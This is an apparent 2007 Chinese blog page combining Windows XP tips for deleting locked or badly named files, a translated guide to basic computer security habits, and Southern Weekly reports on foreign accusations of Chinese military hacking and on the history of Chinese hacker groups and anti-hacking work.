星期四, 九月 13, 2007

利用非常规手段有效删除怪文件

利用非常规手段有效删除怪文件

在Windows系统中,我们难免会遇到用常规方法无法删除文件的情况。尤其是使用Windows XP系统的用户,遭遇此类问题的频率更高。为了解除用户的困惑,我们将尝试通过各种非常规的手段有效地删除那些顽固文件。

一、删除顽固文件的常规方法

1.重新启动Windows操作系统后,再按常规方式删除文件。

2.在DOS(或命令提示符)界面中用Del、Deltree之类的命令删除。

3.利用非Windows资源管理器的第三方工具删除,例如具有浏览文件夹功能的Total Commander、ACDSee、FlashFXP、Nero等软件。

4.如果你安装了两个以上的操作系统,那么就可以在当前系统中删除其它操作系统的文件。

5.在启动时按F8键选择进入安全模式执行删除操作。

下面,我们将针对具体问题做具体分析,为大家介绍因各种原因不能删除文件时应采取的非常规方法。

二、删除“其它程序正在使用”的文件

问题表现:

Windows XP系统中,准备删除一个大容量的AVI格式文件,但系统却总是提示无法执行删除操作,有别的程序在使用,即使刚开机进入Windows系统时也是如此。

问题解决:

方法1:打开记事本,点击菜单栏“文件”→“另存为”,命名文件和你想删除的那个文件名一致(包括扩展名),而后进行替换,会发现容量变为0 KB了。此时,执行删除命令即可。

方法2:在那个AVI文件同目录中新建一个文件夹,然后重新启动。现在,不要选那个AVI文件,先选择适才新建的文件夹,然后再同时按Ctrl键+那个AVI文件,执行删除操作。

方法3:把AVI文件的扩展名改为其它任意无效的文件类型,再执行删除操作。

方法4:有一个一劳永逸的方法就是禁用Windows XP的媒体预览功能,点击“开始”→“运行”,输入:“CMD”后回车。然后在“命令提示符”窗口下输入:regsvr32 /u shmedia.dll

回车确认操作后将卸载视频文件的预览功能。以后在需要恢复视频文件预览功能时,在“命令提示符”中输入:regsvr32 shmedia.dll命令即可。

方法5:启动曾播放过那个AVI文件的媒体播放器,打开另一个文件。此后,再尝试删除即可。

方法6:可用WinRAR程序删除,用鼠标右键单击那个AVI文件,在弹出菜单中选择“添加到压缩文件”,而后在弹出窗口的“常规”标签页中选择“压缩后删除源文件”复选框。确认操作后,执行压缩操作。最后再删除该压缩文件。

方法7:调出“Windows任务管理器”,在其中选择结束Explorer进程,但此时不要关闭该窗口。这时候,会出现像死机一样的状况。我们切换到“应用程序”标签页,点击“新任务”按钮,输入Explorer.exe 并确认操作。此后,桌面又恢复正常了,再执行删除操作即可。

三、巧妙删除“非空文件夹”或“坏文件”

问题表现:

在Windows XP系统下(NTFS分区格式),无论是在资源管理器还是用第三方工具都删除不了指定文件,例如用Total Commander删除,先提示文件夹非空,确认后没任何反应。即使用DOS盘启动,加载ntfs for dos pro可读写版本,也删除不了,提示说是“坏的文件名”,但是可以看到该文件夹。

问题解决:

这种情况下的文件无法删除很有可能是由于在NTFS格式下长文件名造成的。我们可以使用8.3格式缩小长度或更改路径中部分目录名以减少路径的长度。例如可以暂时把路径中某些目录改名字,或在命令行模式下使用8.3格式。例如,“Linux Faq”的目录变成8.3就是“LINUXF~1”了,通过“Linuxf~1”就能进入目录了,此后就可以使用Del命令删除指定文件了。如果需要删除目录,则使用Rd命令。

四、巧妙删除“指定程序或文件正在使用”的文件

问题表现:

在执行删除文件操作时,系统在弹出对话框中提示指定程序或文件正在使用,无法删除之类的警告信息。

问题解决:

方法1:对于此类情况,我们可通过结束预删除文件的相关进程来解决问题。那么,如何能获知指定文件与哪些进程相关联呢?可以使用WhoLockMe这款小工具一探究竟。我们运行“Install.exe”先安装该程序。

下面,进入预删除文件所在目录,用鼠标右键单击该文件,在弹出菜单中选择“Who Lock Me?”。

这时会弹出“Lockers”窗口,在其中我们可以获知当前所有调用该文件的进程。

选定其中的进程名称后,点击“Kill Process”按钮,弹出“Kill-Confirmation”对话框,在此点击“是”按钮确认结束进程操作即可。结束所有相应进程后,就可以通过正常途径删除指定文件了。

小提示:其实这种方法尤其适用于删除木马服务器,这种极有威胁性的小东东只有封杀了与其相关的所有进程后才能删除。

方法2:如果指定程序或文件所调用的DLL动态链接库文件还在内存中未释放,删除时也会提示文件正在使用。这种情况下,我们在DOS环境中删除系统的页面文件即可,Windows 9X系统中是“WIN386.SWP”文件(位于系统盘的Windows目录中),Windows 2000/XP系统中是“pagefile.sys”文件(位于系统盘根目录下)。

方法3:如果系统中常驻病毒防火墙,而它在扫描查毒时正在检查你准备删除的文件,那么系统也会提示文件正在使用。此时,我们只需要暂停实时监控操作即可。

五、巧妙删除其它类别的怪文件

1.用户权限问题导致无法删除文件

如果当前的Windows用户登录身份不具有删除指定文件/文件夹的权限(针对Windows NT/2000/XP/2003操作系统),只要重新以管理员身份登录即可。

2.非法字符导致文件或文件夹无法删除

如果是由于非法字符导致文件或文件夹无法删除,可以在“命令提示符”界面中进入要删除文件的目录,输入“dir>del.bat”,利用DOS的管道命令把当前目录的文件列表自动输入到批处理命令文件“del.bat”中,然后修改该批命令文件,仅保留文件或目录名,并在文件或者目录名称前增加“del ”或者“rd”,然后运行批处理命令即可删除。

3.无法删除系统中的任何文件

查看系统中是否安装了具有反删除功能的防护软件,如果是则将其删除即可。

好了,以上为大家详细介绍了删除顽固文件的几种绝招,相信会了这几招后,你便可以轻松消灭这些怪文件了。

简单安全习惯 减少电脑资料丢失损坏几率

来源:赛迪网 作者:Mindi McDowell, Allen Householder/刘亚萌 译

有一些很简单的安全习惯,如果你坚持使用,将会极大的减少你电脑中的资料丢失或损坏的机会。

如果将别人获得你资料的机会减到最小?

你也许可以轻易地确认出,不管是合法的还是非法地进入过你的电脑的人—比如家庭成员、室友、同事、某个清洁人员或者其他人。但是要确认出有谁远程进入过你的电脑信息就变的困难多了。只要你的电脑连接到了网络上,那么对于某个人或者某个能侵入或损害你的信息的东西来说,你就是很脆弱的。然而,你可以通过建立良好的习惯来使侵害变的困难。

当你离开电脑时锁上电脑。即使你只是离开电脑几分钟,对于某些人来说也已经足够摧毁或者损坏你电脑里的信息了。锁上你的电脑,以阻止其他人轻易地坐在你的电脑前进入到你所有的信息里面。

当你不用电脑时断开电脑的网络连接。新技术的发展比如DSL和电缆调制解调器,能够让使用者一直保持网络连接,但是这一便利也带来了风险。攻击者和病毒扫描网络以寻找可被攻击的电脑目标,而一直在线的电脑会有更高的几率被当成目标。根据你选择的网络连接的方式,你可以选择终止拨号连接、关闭电脑或调制解调器,还有断开电缆。

评估你的安全设置。大部分的软件,包括浏览器和电子邮件程序,都为满足你的需要和要求提供了多种多样的特色。为提高便利性和功能性而进行的某些特色设置,可能让你面对攻击时更加脆弱。检查设置很重要,尤其是检查安全设置,选择那些能够满足你的需要,又不会让你面对更多威胁的选项。如果你安装了一个补丁或者一个软件的新版本,或是你听说有些东西会影响你的设置,那么请重新评估你的安全设置以确保它们仍然适用。(请参考深入理解补丁,保卫你的数据和评估你的网络浏览器安全设置来了解更多情况)。

还可以采取其他什么方法?

有时威胁不是来自其他人,而是来自自然的或技术的原因。尽管没有办法控制和阻止这类问题发生,但是你可以为这种情况做好准备,将损害减少到最低的程度。

保护你的电脑对付电力激增。 除了提供插在你电脑上的输出及外设外,一些电源板还保护你的电脑不受电流激增损害。很多电源板的广告声称如果不能有效保护你的计算机将给予补偿。在电流激增发生概率会增加的雷电暴风雨或工程建设期间,考虑关闭电脑并拔掉所有电源。仅仅只是电源板是无法在电流激增时保护你的电脑的,但是有产品可以在电流激增或停电时提供不间断电源。

把你的所有资料备份。不管你是否采取了自我保护的措施,总是有可能出现各种情况损害你的数据。你大概至少有过一次这样的经历—由于一个事故,一个蠕虫病毒,一个自然事件,或一个你的配置方面的问题而丢失了一个或更多的文件,定期将你的数据备份在CD或网络上,能够减少因为丢失重要信息而造成的压力和其他不良后果(请参考真实世界的警告确保你的网络安全了解更多信息)。决定备份数据的频率由每个人自己选择。如果你持续的增加和修改数据,那么一星期备份一次数据。是最好的选择;如果你的信息内容很少改变,你可以选择不用频繁地备份它。你不用备份存储于CD-ROM和DVD-ROM的软件-如果需要,你直接从这些媒介上安装就可以了。

网络反黑:道高一尺 魔高一丈

《南方周末》深度解析:“黑客们” 究竟谁被黑?

德国、美国、英国、法国政府部门的网站接连受到黑客攻击,而多个外国媒体的报道认定黑客“来自中国”,甚至“中国军方”.为此,本报特地采访美国、英国、德国有关部门、机构和专家,试图追寻事件的真相.

“德国情报机关指中国军方是攻击的幕后主使的说法不太可靠.他们的推测逻辑也许就是这样:计算机专家追踪到了木马程序的源头并发现它们来自中国的一些城市,然后看到这些城市有一些部队的驻地,于是估计这些攻击者来自中国军方.”

——德国专业杂志《CT》副总编辑耶尔格·库里



“最骇人听闻的行动”

  8月26日,德国总理默克尔出访中国。同一天上市的德国杂志《明镜》封面上,一个黄色面孔的人从幕后向外窥探,封面故事标题颇为抢眼:黄色间谍。

  报道指责在德国发生的越来越多的工业间谍活动与中国有关。文章援引德国有关部门消息称,经济部门、联邦总理府和三个政府部门的计算机系统被来自中国的木马病毒感染,而且这一黑客行动是有组织的,矛头直指中国政府。

  9月3日,英国《金融时报》披露,五角大楼承认曾在6月遭到迄今为止最严重的黑客攻击,被迫关闭了包括美国国防部长盖茨办公室的电脑系统。报道中,一个匿名的某高级政府官员称:“极有可能与中国人民解放军有关。”

  两天后,英国《卫报》报道称,根据英国首相办公室的消息,包括外交部在内的多个政府部门曾遭到来自中国的黑客袭击。

  9月8日,法国《世界报》引述法国国防秘书长德隆说,法国政府的电脑网络也曾遭中国黑客入侵。

  英国皇家联合研究所亚洲安全项目负责人、中国问题专家阿列克谢·尼尔称,中国的黑客攻击已经持续了“至少4年”,而“中国黑客攻击美国国防部网络的事件,是迄今为止最大胆、最骇人听闻的行动”。他认为这是中国军方在彰显实力。

  在西方媒体集体描述出的这出黑客大戏里,中国黑客成了训练有素、单枪匹马挑战整个西方世界的网络入侵者——尼奥(美国影片《黑客帝国》主角)的制造者们,这次则扮演纯洁无辜的受害人。

  “谁攻击了我们?”

  《明镜》周刊《黄色间谍》的报道称,根据德国联邦宪法保卫局和联邦信息安全中心(BSI)的检测显示,来自中国兰州、广州和北京的黑客,试图通 过韩国服务器的中转隐藏身份,把木马文件伪装成Word或Powerpoint文档,当德国政府部门的官员打开这些文件的时候,间谍软件就被悄悄地安装到 电脑里。

  而类似问题早在今年5月就已发生过,据说,德国专家已多次成功拦截来自中国的黑客攻击,并阻止了大约160GB大小的文件资料流失。

  无论该报道消息来源和真实性确凿与否,作为德国发行量最大、在德语世界有重要影响力的时政杂志,《明镜》周刊的报道本身已成为新闻事件。

  到目前为止,德国有数十家媒体,包括主流媒体如《法兰克福汇报》、《焦点》等,都对该报道进行了转载和后续报道,有些标题为:《黑客,把中国钉在耻辱柱上》或《中国黑客无法无天》等。

  在美国科技杂志“新科学家”的网站上,记者发现,许多帖子抱着“宁可信其有”的态度,表达了对中国的忧虑,有人说:“我们是不是和中国走得太近 了。经济上离不开中国,现在如果连军事方面的信息都被中国掌握了,中国对美国的威胁就太大了。”但对于确认中国黑客发起攻击这一点,并无人细究。

  技术专家介绍,追查黑客身份十分困难。许多企业在进行恶意攻击时,已经不再使用自己公司的电脑,而是随便找一个互联网用户,通过病毒感染这名普通用户的电脑,然后黑客再利用这台被感染的电脑发动攻击。因此追查“凶手”的工作有时会很艰巨。

  德国专业杂志《CT》副总编辑耶尔格·库里,在德国国家广播电台——“德国之声”的访谈中认为,德国情报机关指中国军方是攻击的幕后主使的说法 不太可靠。他们的推测逻辑也许就是这样:计算机专家追踪到了木马程序的源头并发现它们来自中国的一些城市,然后看到这些城市有一些部队的驻地,于是估计这 些攻击者来自中国军方。

  德国不来梅大学互联网和数据保护专家拉尔夫·本德拉特也认为,类似“中国黑客有来自中国政府和军队的支持”的结论下得太匆忙。换句话说,中国人民解放军的电脑也完全有可能被其他人为了自己的进攻需要所“借用”。

  技术专家分析说,各类情报的说服力十分有限。人们无法拿出能够被法院认可的证据,除非专家们逆向追查到黑客的电脑。

  冰山之一角

  美国《时代》周刊网站登出路透社专门报道互联网的前任记者沃纳的文章,里面引用了一名叫罗伯特·普来托尼的网络安全专家的话:“我认为,这个事件只是冰山一角。和中国有经济或政治利益的国家,都有可能成为中国的目标。”

  普来托尼有自己的监视黑客攻击的网站Zone-h.org,他也为美国政府人员进行网络安全培训。他说,三年前,欧洲议会的电脑系统受到的攻 击,和这次五角大楼的很像,都是使用一种木马程序,作为电子邮件的附件,自动下载到对方电脑里,搜索文档文件、电子图表文件等。那次攻击的源头被查到是来 自中国江苏省,而且技术的娴熟程度,让网络专家相信不会是散兵游勇的黑客所为。

  华盛顿一名不愿透露信息的软件安全公司的专家说,国防部有整整一个部门来分析每天各种攻击的来源,如果说他们完全无中生有,可能性比较小。但 是,现在借助别的网络地址掩盖真实身份、迂回攻击的技术越来越高了,除了国家之间的利益之外,许多和国防部有经济利益的组织,为了拿到大的军事合同,打败 竞争者,也会选择黑客手段来获得第一手内部信息。

  “单指责中国人是不合适的”

  德国专业杂志《CT》副总编辑耶尔格·库里,在“德国之声”电台的访谈中表示,情报机关利用黑客手段是众所周知的,现在网上甚至出现了专门编写 窃取情报程序的“黑客专业户”,他们的服务对象也包括某些试图窃取竞争对手资料的企业。这类交易十分红火,专家估计这一业务创造的价值已逾10亿美元。

  “有人质疑中方的伦理道德有问题,这很矛盾,因为德国同样存在这样的行为。”库里说,“德国联邦情报局也使用过类似手段。我们也知道,美国国家安全局内有关部门专门从事工业间谍活动。在西方社会,人们并不把这种行为看成是道德败坏,单单指责中国人是不合适的。”

  在美国的各种BBS、雅虎讨论组和博客上,中国黑客的新闻也引发了各种讨论。在BBS上,一些人怀疑这个发生在6月的事件现在才被抛出,其实是五角大楼故意给记者透露一些风声,希望布什在APEC会议上会和胡锦涛讨论这个话题。

  9月6日,“德国之声”网站上登出了题为《稀奇的不是中国军队黑客进攻,而是对此精确定时的炒作》的文章,质疑一些国家政府网站遭到中国军方黑客攻击的报道。

  美国国防部也遭到了美国黑客们的嘲弄,他们说“只要你在大学七年没吸过大麻,就能被招到国防部去”。他们还制作了漫画,漫画中的国防部官员严肃地问:是谁攻击了我们的网络?一名坐在电脑前的技术人员紧张地答非所问:确定!

  “我们不评论安全事务”

  在媒体密集的报道中,除了法国《世界报》和法新社明确消息来源为国防秘书长德隆外,其他媒体均未指明消息来源。

  本报记者试图与相关国家政府相关部门联系,但各国政府不约而同三缄其口。

  美国国务院新闻部门给记者的电话回应非常谨慎,表示这是五角大楼的事务,他们不予置评。当记者提到美国国务院的新闻发言人汤姆·凯西曾经谈论过此事时,该部门则承认凯西的说法就代表了现在国务院对此事的态度。

  此前,9月4日的新闻例会上,凯西被问到被媒体炒得沸沸扬扬的中国黑客入侵别国电脑一事,凯西避免了正面回答,只是说,据他所知,国务院的电脑并没有受到这次攻击的影响。如果中国或别的国家组织黑客入侵美国政府的电脑系统,美国政府一定会提出抗议。

  五角大楼也给记者发来一份官方发言,但没有提供其网站受到攻击的详情,也没有提供关于攻击者的信息。

  9月5日,美国国防部新闻发言人杰弗里·莫雷尔公开表示,他不会回答谁在今年6月入侵了国防部的电脑,以及是如何入侵的。他只是承认国防部的电 脑的确受过攻击,并且导致了短暂的停机,但是很快就恢复了正常运转。他强调,每天都有几百次对国防部电脑的攻击,但是国防部有及时的应对能力,而且恢复的 速度越来越快。

  德国《明镜》周刊该次报道消息的两个主要来源——德国联邦宪法保卫局和联邦信息安全中心(BSI),则都对笔者否认曾经透露任何信息给媒体,并拒绝对该报道的真实性做任何评判。

  记者还联系了报道中提到的受木马病毒感染的德国政府部门,这些部门的发言人同样拒绝对《明镜》报道的真实性做任何评价。

  9月10日,记者拨通英国外交部新闻办公室电话,得到的回答只有一句话:“我们不评论安全事务。”

  中国政府辟谣

  国外媒体频繁报道“中国黑客”,中国外交部发言人也随之就此多次回应。

  针对《明镜》周刊的报道,外交部发言人姜瑜8月26日在回答媒体提问时说:中国政府一贯反对和严禁包括“黑客”行为在内的任何破坏计算机网络的 犯罪活动,中国的相关法律法规对此做出过明确规定。中国也经常遭受“黑客”袭击。中国与许多国家建立了共同打击网络犯罪的良好合作机制。

  9月4日,有记者提问:“据报道,美方称攻击五角大楼网络的黑客可能是来自中国人民解放军。这是第二次中国被指责攻击外国政府的网络。中方对此 有何评论?”姜瑜回答说:“有人对中国进行无端指责,妄称中国军方对美国防部实施网络攻击,这是毫无根据的,也是冷战思维的体现。”

  法国宣称受到中国黑客袭击后,9月11日,姜瑜表示:“截至上星期,有关部门并没有接到相关国家有关协查的要求。在共同打击包括黑客行为在内的网络犯罪方面,我们有国际执法合作的渠道,愿意通过正常渠道加强国际合作。

  “中国黑客”十年:刺刀还在,理想已经滑落

  在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则几成犯罪的代名词



  “熊猫烧香”在网络上猖狂,不少网络用户被染上病毒,网络安全在次敲响警钟

  六年前,“中国鹰盟”成立之初,黑客万涛吟咏着“我们要做民族的精英,我们会永远战斗不息”,他的经典台词是为刺刀装上理想,像拿破仑的军队那样。

  现在,2007年9月11日,远在成都出差的中年白领,惦记着夜晚的宵夜,然后悲哀地承认,如今的黑客圈是“名利场和大染缸”,他宁愿选择“永远缅怀”。

  龚蔚,十年前成立中国第一个黑客组织——“绿色兵团”,如今甚至都已不愿轻言往事,“那是一段成长的历史”,他说自己反思过,检讨过,再无重温 的激情,江湖也早无goodwell(网名)。尽管源于上世纪60年代美国的“黑客”(Hacker)一词,最初的含义只关乎技术,指那些尽力挖掘计算机 程序的最大潜力的电脑精英,但在中国短暂而一度喧嚣的黑客历史上,几乎从没有过纯粹的时光,它一再被捆绑和裹胁,最先是爱国精神,然后是商业利益,现在则 几成犯罪的代名词。

  “当你企图用文化去解构技术,它也许会发展成科学,也许会发展成巫术。”老牌黑客alert7说。

  十年回首,那些曾经公开宣扬爱国,并在印尼排华、中美撞机等一系列历史事件中成功实施跨国网络攻击的黑客组织们,譬如绿色兵团、中国黑客联盟、红客联盟,大多风云流散,或者名存实亡。

  当年的黑客教父,要么在商业的泥潭里泥足深陷,要么已悄然归隐,取而代之的是汹汹而来的以牟利为动机的新一代伪黑客、骇客们,以及日益攀升的有关黑客犯罪的冰冷数据。

  这就是残酷的现实,正如万涛所说,刺刀还在,思想已经滑落。

  那绿色和平的家园!

  在世界头号黑客凯文·米特尼克因为非法侵入政府网站而入狱整整两年后,中国才诞生了第一个真正意义上的黑客组织。

  1997年,上海黑客龚蔚(goodwell)在境外某网站申请了一处免费空间并在国内做了镜像站点,用于黑客之间的交流,成立“绿色兵团”。

  发起人龚蔚如今的解释是,一切出于爱好和兴趣,当然还有同道切磋比拼的快感。“与利益无关,与政治无关”。

  绿色兵团的名字,来源于他美好的梦想,“以兵团一般的纪律和规则,打造绿色和平的网络世界”。

  1998年仅一年,阵容便趋于鼎盛,龚蔚回忆说,注册人数不下5000人,核心团队有一百多人,分布在湖南、福建、广东、北京、上海各地,这包括如今已被尊称为教父级的rocky、solo、小鱼儿、冰河、小榕、谢朝霞等等。

  彼时的中国互联网还在起步间,对于普通人还是个陌生的名词,商业利益无从谈起,这得以令一帮沉醉于挑战技术的网络爱好者,纯净地栖居。

  他们中一些是二十出头的大学生,初衷简单,甚至没有自己的电脑,有时为了争夺校园实验室里的机位而废寝忘食。

  他们信守自己的黑客准则,甚至崇拜雷锋,主张网络技术共享、互助,耻于随意的攻击,遑论以之牟利?

  绿色兵团的早期成员冰河(glacier)说,完全是靠自己的兴趣和网友的鼓励,才写出了中国最早的特洛伊木马程序,他最初只是想编写一个方便自己的远程控制软件。从不曾想竟成为之后中国最受诟病的黑客攻击软件。

  后来的黑客组织“第八军团”的陈三公子,当时还只是个“菜鸟”,他说,黑客有黑客自己的行为准则,有自己的道德规范,正义、平等、共享、互助,“这是一种追求卓越和完美的精神”。

  红客,民族的红色!

  纯净的时光总是倏忽而逝,绿色兵团一位早期黑客现在说,再也不会回来了。

  1998年5月,印度尼西亚发生排华事件。正蹒跚学步的中国黑客们决定声援,并向印尼网站发起攻击。这成全了他们第一次在公共视野的亮相,并且携爱国义举一呼百应。

  组织者绿色兵团名噪一时,年轻的黑客们初尝被视为民族英雄的自豪。

  当年的组织者龚蔚现在承认,一是民族情绪使然,再则不排除年轻人的出名冲动。

  如今,谢朝霞甚至说,当时受了鼓动——鼓动显然不是褒义词。他行事低调,百般推辞采访,并拒谈任何个人情况。

  最初江湖规则,尚被遵守,“我们留真名,只为表明我们的态度,不去窃取资料,也不恶意破坏对方设备。”龚蔚说。

  朴素的爱国情绪造就了中国黑客最初的团结与坚强的精神,甚至出现了“中国黑客紧急会议中心”,负责对外国网站攻击期间的协调工作。

  之后便是1999年的北约轰炸中国大使馆,中国黑客又一次大规模地团结起来,纷纷开展了对美国网站的攻击。在中国大使馆被炸后的第二天,第一个 中国红客网站,“中国红客之祖国团结阵2001年,中美黑客大战,8万中国黑客一起行动,使中国红旗在美国白宫网站飘扬两个小时。他们自称“卫国战争”。

  中国红客联盟、中国鹰派联盟、中国黑客联盟三大黑客组织成为这场中美黑客大战的主力军。一时间,红盟的lion、鹰派的万涛成为中国黑客英雄。

  前者宣扬红客精神,给自己起了个独特的名字——“红客”(Honker),希望以政治立场的正义性来证实自己攻击行为的合法性。

  真实动机的揣测已经不重要,客观上,对于民族情绪的附庸,以及爱国旗帜的高扬,促成了中国黑客的急速成长。2000年的街头,黑客技术就像今天的blog(博客)一样流行。“报效祖国”成为年轻触网者最惯常的口头禅。

  2002年4月,中国互联网协会公告制止有组织的攻击行为。红盟至此一蹶不振,只沦为少人问津的网页。而滔滔直下的网络安全产业,令昔日的黑客们竞相转型,别无他顾。

  “在根本意义上,网络黑客所采取的手段和大学生对美国大使馆扔石头和墨水瓶没有什么两样,只是一种宣泄的手段。”中国社科院教授闵大洪曾一针见血地评价。

  “时代变了,环境变了,网络也变了,”绿色兵团当年一成员感慨红色激情转瞬即逝的原因,“黑客又怎么能不变?”

  大规模的以民族主义为名的攻击再难开展。2004年最后一天,中国红客联盟首领Lion宣布闭站,闵大洪教授撰文宣告告别中国黑客的激情时代。

  商业迷梦

  纯技术的理想也好,爱国的激情也罢,结果证明,在网络泡沫泛起、创业诱惑迭现的2000年前后,中国的黑客们变得脆弱。原本隐秘的江湖,出于商业的需要,也不可避免地驶向浮华和炫耀。

  “回到现实,黑客们也是普通人,也需要吃饭,生活和个人发展。”早期绿色兵团的成员周帅不主张道德评价。

  而第八军团的组织者陈三公子至今仍坚持,“合法地利用黑客技术,将它转化为合法的商业价值,我相信这也许就是众多黑客们体现自己价值的最高境界。”

  1998年始出现的一系列的攻击行动,客观上也提醒了国人对于网络安全的认识,网络安全行业方兴未艾。

  1999年,中国最早也是一度最强大的黑客组织绿色兵团纵身转型,脱胎为中绿联盟,当年7月成立了上海绿盟计算机网络安全技术有限公司。

  随后,中国第一代黑客们纷纷扔掉利剑,举起盾牌,成群结队向网络安全领域进军。

  “当时中国最顶尖的黑客人才,90%变身为了网络安全专家。”龚蔚说。

  这些黑客教父昔日轻而易举地以爱国、民族旗帜一举成名,却不想,在商业的泥潭里,泥足深陷。

  商业的迷梦,只消一年便告完结。2000年,上海绿盟即告解散。

  龚蔚现在似乎有些后悔,绿色兵团风云四散,不仅仅是个人利益得失,更重要的,他以为,打开了商业资本的魔盒,终于侵蚀了本该纯净的黑客理念。而他被视为那个打开潘多拉魔盒的人。

  周帅似乎显得早有预见,他说,自己从没有向网络安全领域迈进一步。

  绿盟的失败,被如今的当事人解释为,尊奉的黑客自由理念与商业资本产生了冲突,这可能包括“网络安全公司赢利迫切,名为防卫,但难免要做一些攻击行动,打着法律的擦边球,以求业务的提升”。

  不能容忍者选择逃离,而被资本俘获的却可能是大多数。

  而另一部分人,比如万涛在寻找着其他可能,2002年他通过媒体回应当时的广东省长,中国黑客愿为政府服务。他曾经多么郑重地呼吁黑客的责任意识,甚至用上了最流行的“中国特色”的前缀。只可惜,未得实质回应。

  “中国黑客的大联盟时代已经过去,现在是一盘散沙。”周帅说。

  回头太难

  网络的普及速度,比想象中要快,而黑客繁衍的速度或许比网络普及的速度还要快。

  当黑客工具可以如此直接地带来商业利益,可以视为一种产品创造经济数据的时候,精英小众化的面纱便不复存在。

  2000年之后,中国的所谓黑客队伍迅速扩大,众多唾手可得的黑客工具与软件使得进入黑客的门槛越来越低,网络间随处是黑客速成培训班,当300元钱就可以攻破一个邮箱,换回一套傻瓜黑客工具时,混乱已经无法避免。

  甚至当年的黑客对这个称谓也惟恐避之不及,“太复杂了”是紧跟的喟叹。

  龚蔚回过头来要重新捍卫作为黑客的纯洁性。万涛说,黑客应该是有道义、有良知的技术高手,他与骇客的区别是在进入别人的计算机以后,一个是善意提醒或悄然离开,而另一个则大肆破坏。

  “这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”

  还有人偶尔会说起红客,一个曾经以民族、爱国立身的词汇,据说Lion又重新开起了红客联盟,可惜悄无声息的网站上,他自己都一个月没有登陆了。熟悉他的朋友说,他活得很滋润。

  再比如另一个“大红客联盟”,实际上只是一个代号了,他操心的是自己十几人的安全公司,甚至一将黑客与国家利益联系在一起,他本能地会问,“不敏感吗?”

  更多的对于民族主义渲染,已经悄然变成了黑客网站揽钱广告上的一句经典台词,“一个月包会攻击日本电脑”。

  陈三公子说,现在只有极少数仍然坚持黑客本色,默默地专注于技术研究,而另一部分闹得沸沸扬扬,其实是专注于商业利益。他亦曾被如此揣度。

  “他们不是以技术为目的,而是以金钱为目的,他们在扭曲了黑客的同时,亦为社会埋下了众多不安全隐患。”

  万涛说,看多了打着爱国幌子招摇撞骗的黑客,他最后的结论很悲伤,“和娱乐圈里的明星一样,绯闻是其花絮,注意力、快感和财富是其最终的归宿。”

  龚蔚觉得,黑客世风日下,绿色兵团甚至难辞其咎,因为他们的失身下海,才造成了黑客精神被割断。他孜孜以求想建立一个大基金会,不涉网络相关的运作,重新回归到“绿色和平的网络世界”,“goodwell,不应该只属于一个人”。

  他自己并不清楚,还有谁会放弃名利,愿意回归,也偶尔会觉得幼稚,但“总得试试吧”。

  中国从未停止过网络反黑

  正如互联网技术没有尽头一般,打击黑客的举措也必须日新月异,所谓“道高一尺,魔高一丈”,中国的网络反黑依旧任重而道远



2006中国国际网络安全技术与应用展览会在京举行

  真相难觅的“外国政府网站遭中国军方黑客袭击事件”,在中国威胁论等政治层面的揣度中,渐入尾声。

  背后真正应提醒的网络安全,却常常在政治话语间被忽视。

  “联网计算机不采取安全防范措施,只要是开着,总有一天会成为黑客的猎物。”许榕生,这位中国国家计算机网络入侵防范中心首席科学家坦言,我国信息安全的形势十分严峻。

  网络反黑,中国究竟还缺什么?

  愈互联,愈危险

  仅仅在2007年上半年,中国大陆地区被植入木马的主机IP远远超过去年全年,增幅达21倍;被篡改的网站数量比去年同期增加了4倍。

  作为去年中国互联网的一个标志性事件,“熊猫烧香”病毒成为众多网民的噩梦。病毒从2006年底开始肆虐,截至今年2月,共发现11万个IP地址被感染。

  在中国早期黑客、原“绿色兵团”成员周帅的眼里,互联网真正安全的措施只有物理隔断,“有门就必然有缝,有缝就有被侵入的可能”。

  这并不是夸辞,如今的黑客技术早不是中美黑客大战时的人海战术,不停PING对方网址,或乱扔一气邮包炸弹,以堵塞对方的带宽而导致网络瘫痪,“在圈子里,那是杀敌一千自毁八百的落伍战术”。

  现在黑客则主要依靠远程攻击,一则针对服务器,寻找对方程序漏洞,侵入,既而蔓延对方网络,另一则是针对个人用户,远程植入木马程序。“技术好的黑客所用的木马程序,都是定制的,一般病毒软件和防火墙都不会有反应。”

  为了反追踪和隐身,现在的黑客还往往采用第三方攻击,即选取跨地区或跨国界的第三方电脑或服务器作为跳板,一旦对方跟踪,几乎不可能追溯到攻击的最终来源。

  如果说早期的黑客攻击或出于恶作剧以炫耀为目的,或出于民族情结和爱国情绪的话,互联网大规模商用之后,黑客犯罪呈现出趋利化的趋势。

  以深圳为例,作为全国最早成立网监局的城市之一,深圳网监局每天接到的网上盗窃游戏账号、QQ币,甚至银行密码的案件就达到30例,且呈日益上升的趋势。

  “集团化、专业化趋势明显,有上线专门负责盗取,有负责网络汇总,有下线负责网上销赃。”深圳市网监局一位官员介绍。

  更为严峻的是,在网络许多黑客速成软件和培训班的运作下,黑客的门槛越来越低,“黑客软件已经傻瓜化”,只需数百至上千元就可获得并掌握,一位 网名为Angel kiss的培训者告诉南方周末记者,运用他教授的入侵技术,再借助网上随处可以下载的漏洞扫描工具,一个初级黑客一晚上可以入侵十来个网站。

  “用黑客产业链来形容,毫不过分,甚至还在日益升级。”上述官员称。

  道高一尺,魔高一丈?

  中国从未停止过网络反黑的步伐。

  许榕生开发的“取证机”已经在中国南方地区推广,可以像飞机“黑匣子”一样记录服务器的变化情况,记录黑客入侵的蛛丝马迹,同时作为“证据”来提取,以备查证。

  国家层面的努力也一直持续,1994年2月,《中华人民共和国计算机信息系统安全保护条例》出台。1997年修订的刑法中,增加关于计算机犯罪的条款。

  1998年起,公安部正式成立“公共信息网络安全监察局”,此后各地公安局也纷纷成立网监部门。2000年10月由政府支持的国家计算机网络应急技术处理中心(CNCERT / CC)成立,以此为核心,建立起31个分中心。

  而民间层面,截至今年7月,中国有网络安全应急组织57家,包括骨干网络运营单位、社会安全防范机构、公司、大学和科研院所等。

  五年前,许榕生还曾对南方周末记者表示,正积极呼吁成立网络反黑部队。

  一张密集的反黑客网络正日益严密,且试图像互联网一般,与国际接轨。

  2007年8月,美、英、法、德等国竞相指责中国黑客肆意攻击外国政府和军方网站后,中国政府一方面就指责黑客来自中国军方的说法进行了澄清,同时也主动表态,愿与别国政府共同查清黑客攻击真相,联手打击黑客犯罪。

  但正如互联网技术没有尽头一般,打击黑客的举措也必须日新月异,所谓“道高一尺,魔高一丈”,中国的网络反黑依旧任重而道远。
